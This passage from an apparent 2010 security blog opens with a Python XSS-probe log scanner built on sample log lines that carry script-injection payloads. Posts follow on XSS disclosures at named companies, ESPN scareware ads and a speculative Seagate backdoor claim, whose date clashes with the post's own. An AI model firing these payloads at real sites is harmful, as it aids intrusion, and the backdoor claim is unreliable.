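    '203.0.113.7 - - [11/Sep/2010:20:01:09 +0530] "GET /talk/feature.html?genre=21%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5164',
    '198.51.100.9 - - [11/Sep/2010:20:02:44 +0530] "GET /boards/mb?sport=espn&id=index HTTP/1.1" 200 8802',
    '198.51.100.9 - - [11/Sep/2010:20:02:51 +0530] "GET /boards/mb?sport=espn%27%3E%3Cscript%3Ealert(1)%3C/script%3E&id=index HTTP/1.1" 200 8839',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_log(lines):
    """(client ip, path, [flagged params]) for every log line carrying a probe."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        flagged = scan_url(m.group(2))
        if flagged:
            out.append((m.group(1), urlsplit(m.group(2)).path, flagged))
    return out


if __name__ == "__main__":
    payload = '21\'"/><script>alert(1)</script>'
    print(render_unsafe(payload))
    print(render_safe(payload))
    for hit in scan_log(CONSTRUCTED_LOG):
        print(hit)
```

The generic `<`...`>` rule also catches obfuscated tags such as the `<-script->` form in the Cognizant PoC. The detector is for finding probes in logs; the fix is encoding on output for the context the value lands in (attribute, text node, URL), as `render_safe` does, not filtering on input.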

Friday, April 2, 2010

Backdoor in Seagate..

Yesterday, on March 02, 2010, when I started Seagate Backup Manager from my desktop I had no freakin idea that my AV alerts and HIPS logs were going to scream their lungs out.

I've a 320 GB portable, a 500 GB external and another 500 GB external backup drive. I had the 320 GB plugged in. Upon starting the backup manager, the system came to a disturbingly slow crawl. A 100% CPU hog started. Of course, at that time, I thought it appeared to be due to the 2 VMs running on my box. Since that hadn't occurred even when I work on my VM lab - around 6 workstation VMs and 2 server VMs - something didn't look right. So I checked & found there is this known bug / behavior with Seagate Backup Manager. Ok, so I rebooted the box and started up again with what I had been doing earlier.

And then the AV alert pop-ups suddenly seemed to go berserk. McAfee AV started detecting and deleting / cleaning up exploits and trojans, and the alerts stood there on the screen.

Here's a portion of alerts screens I captured:


So I decided to check HIPS logs as well. I found there were several continuous attempts to access outlook files and address books, primarily. All were denied, of course.

Here's some of the screens from my box's HIPS logs:

As you can see above, the exploits do not seem specific to Windows. There are generic trojans, backdoors, and Linux exploits as well. The HIPS logs also suggest the behavior of a typical trojan / virus attempting to access email program files and the address book.

I checked for any outbound connections when I started this app again later. There were no suspicious destinations at all. It appears to me this is kind of a scheduled activity built inside the application. I recall using this app post lunch hours and nothing had come up then.

In my opinion, this is what might have happened when I started the Seagate backup manager:

1. Application gets started, calls 'home'
2. Receives exploits / trojans / virus / backdoor etc.
3. Executes them

After the recent Energizer backdoor disclosure, it had been speculated that the backdoor was actually an administrative function for developers. Now looking at yesterday's incident, with another widely used brand, I find these behaviors could very well be more than just speculations or errors from developers.

It may not be incorrect to consider these incidents as calculated and planned attack vectors. Today when even big corporations are consistently receiving security advisories, then it is impractical to believe the HDD vendors are secure. Compromise of their server(s), responsible for pushing product updates on to the end-clients, can cover a broad target surface for an attacker(s) over a short period of time.

As long as vendors are not held accountable, I believe we cannot expect them to respond proactively. And till then, it remains the responsibility of the Information Security pupils to find the holes and get them fixed, as it has long been.

Please feel free to share your experience and thoughts over this finding / incident.

Best Regards..

Tuesday, March 23, 2010

Capgemini CTO Blog Cross-Site Scripting (XSS)


+++About Capgemini+++
A global leader in consulting, technology, outsourcing, and local professional services (http://www.capgemini.com/about/)

+++Affected URL(s)+++
http://www.capgemini.com/ctoblog/search_blog.php

+++Vulnerable Parameter / Function+++
'Search'

+++PoC+++



Capgemini 1st Notified: February 18, 2010
Capgemini 2nd Notification: March 02, 2010
Response Received: March 02, 2010
Detailed Info Emailed: March 03, 2010
Current Status: Fixed (As of today, March 23, 2010)

Thanks to Richard Fahey @capgemini for his quick response on resolving this issue.

Best Regards.

Monday, March 1, 2010

TVS Star City Cross-Site Scripting (XSS)

+++About TVS Automobiles+++
A leading automobile company with operations in India, whose popular products include the TVS Apache and Star City.

+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.tvsstarcity.com/dealer-locator.asp?id=NEW%20DELHI

+++Vulnerable Parameter(s)+++
'id'

+++PoC+++



Best Regards.

Gulf Business Machines Cross-Site Scripting (XSS)

+++About GBM+++
Founded in 1990, Gulf Business Machines (GBM) is the leading IT solutions provider in the region, fulfilling the IT requirements of local, regional and international organisations in the GCC.

A spin-off from IBM, GBM is the sole distributor for IBM 'excluding selected IBM products and services' throughout the GCC, except for Saudi Arabia.


+++Affected URL(s)+++
All website URLs which are using the vulnerable parameter. For example:

http://www.gbm4ibm.com/inside_networking_services.php?m=first
http://www.gbm4ibm.com/inside_productshowcase_cisco.php?m=fifth


and more ...

+++Vulnerable Parameter(s)+++
'm'


+++PoC+++

IBM first notified: February 18, 2010
Response: None till date
Public Disclosure: March 01, 2010


Best Regards.

Saturday, February 20, 2010

ESPN serving ads to scareware.


Going over ESPN online tonight, I came across this on 'http://games.espn.go.com/frontpage':



Considering this to be a one off random ad, I looked around the site. And these are few of several screens of what I found:




It became apparent these ads were present on majority of ESPN pages. It's your sponsored ad, I know ESPN, but what the heck!

I fired up Sandboxie and opened up this great PC fixer in my sandboxed browser.

The PC MightyMax home page greeted me with its great Windows fixer.

I then downloaded what it offered and proceeded with installation.

As soon as installation completed, 2 processes were initiated - pcmm2010.exe and csc.exe.

And scary info popped up on my screen:

So my box needs to be fixed, as it says. Go ahead Max..


Moving forth with Buy option, a form appears asking for billing details, credit card information


Next screen needed my e-signature so I must give my date of birth; sure legit :P


Looking at the page source during the transaction, it can be seen that some custom validation happens, I think, for confirming whether the credit card, validity date, and CVV are hot or not.


Scroll down a bit and I see this:


After taking the credit card details and basically all PII necessary to make a transaction, a 'one-time' charge is deducted as well.

I've cleared off this mighty fixer from my sandbox. This rogue application - PC MightyMax 2010 - is an example of scareware. Scareware may also be utilized by spyware and / or malware.

From Wikipedia:

Scareware comprises several classes of scam software, often with limited or no benefit, sold to consumers via certain unethical marketing practices. The selling approach is designed to cause shock, anxiety, or the perception of a threat, generally directed at an unsuspecting user. Some forms of spyware and adware also use scareware tactics.

In this scenario, the scareware gained the trust of an unsuspecting user browsing through a trusted site - ESPN - and through strategic placement and frequency of its ad throughout the site, got downloaded and installed on user's box.

Upon getting installed, it followed its basic routine of fake scanning and presenting scary results to make user go to its rogue site and proceed with purchase.

If we look at the cost associated with the purchase, it is damn expensive - $29.95 for 14 days + an additional one-time charge. Apart from these up-front costs, a user is giving away a good share of his/her personally identifiable information as well as credit card details.

From the perspective of the one sitting at the other end and controlling the rogue application, every installation is in all probability generating commission - the economy behind scareware.

The process has been known for the last few years, but the quality of scareware marketing campaigns keeps evolving.

In essence, ESPN is the primary entity responsible for facilitating fraud in this instance. In chasing ad-space revenue, ESPN has clearly overlooked the crucial step of verifying the ad-space buyers and the kind of ads running on espn.go.com.

Let's see for how long this remains unnoticed.

Best Regards.